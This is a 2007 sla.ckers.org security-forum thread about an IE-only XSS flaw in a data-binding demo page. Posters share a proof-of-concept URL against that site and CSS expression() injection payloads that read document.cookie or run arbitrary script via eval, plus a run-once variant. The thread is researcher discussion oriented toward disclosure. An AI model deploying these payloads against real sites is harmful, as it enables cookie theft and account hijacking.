Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Data Binding XSS
Posted by: DoctorDan
Date: August 15, 2007 10:56PM

I think that the data binding idea http://www.wisec.it/ph/test.php that Stefano Di Paolo came up with is awesome. Because it is so awesome, I felt the need to tinker. I found a vulnerability in the styles. It uses IE's nasty CSS expression()s with a compact if/else statement to execute some JS once (rather than stalling the browser as it usually does). If interested, here's the PoC: http://www.wisec.it/ph/test.php?style=width%3A+expression%28%28window.r%3D%3Ddocument.cookie%29%3F%27%27%3Aalert%28r%3Ddocument.cookie%29%29
The example injection is:
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
Is this an issue that is known of? How can I/should I contact Stefano Di Paola, and is it necessary to do so?

-Dan

EDIT: I forgot to mention that it only works in IE.



Edited 2 time(s). Last edit at 08/15/2007 10:59PM by DoctorDan.

Options: ReplyQuote
Re: Data Binding XSS
Posted by: tx
Date: August 16, 2007 01:19AM

nice. I didn't even know javascript supported the test ? true : false syntax

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Data Binding XSS
Posted by: Anonymous User
Date: August 16, 2007 05:25AM

Sure, it's just a ternary operation.

Options: ReplyQuote
Re: Data Binding XSS
Posted by: DoctorDan
Date: August 16, 2007 05:51PM

A more flexible version of the injection is this:
width: expression((window.r==1)?'':eval('r=1;alert("XSS");'))
Using eval() allows us to use several lines (as many as needed) to do what we want, rather than just one.

Thanks, tx. Can I get some input regarding the first post in the topic?

-Dan
EDIT: actually, using an invalid CSS property unfortunately seems to slip by. My comment on it can be found on here: http://ha.ckers.org/blog/20070814/preventing-xss-using-data-binding/#comments



Edited 1 time(s). Last edit at 08/16/2007 10:17PM by DoctorDan.

Options: ReplyQuote
Re: Data Binding XSS
Posted by: acidburn
Date: August 17, 2007 10:37AM

Alternately you can do something like this

background-image:expression(this.runtimeStyle.backgroundImage='none', [insert remaining javascript here])

That will run the JavaScript only once since it will write over itself with blankness. Or for shits and giggles you could write over it with different javascript and to that recursively as many times as you please.

Options: ReplyQuote
Re: Data Binding XSS
Posted by: hackathology
Date: August 19, 2007 11:41AM

nice find, neat work

http://hackathology.blogspot.com

Options: ReplyQuote
Re: Data Binding XSS
Posted by: teksty32
Date: August 23, 2007 01:26PM

agree and is a good one
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
{if possible (best[1])}
http://www.teksty32.com

Options: ReplyQuote
Re: Data Binding XSS
Posted by: Anonymous User
Date: August 24, 2007 04:26AM

Can't we use this data binding to exploit Firefox? like we discussed lately? I have a sneaking feeling it might be used to probe the chrome://

Options: ReplyQuote


Sorry, only registered users may post in this forum.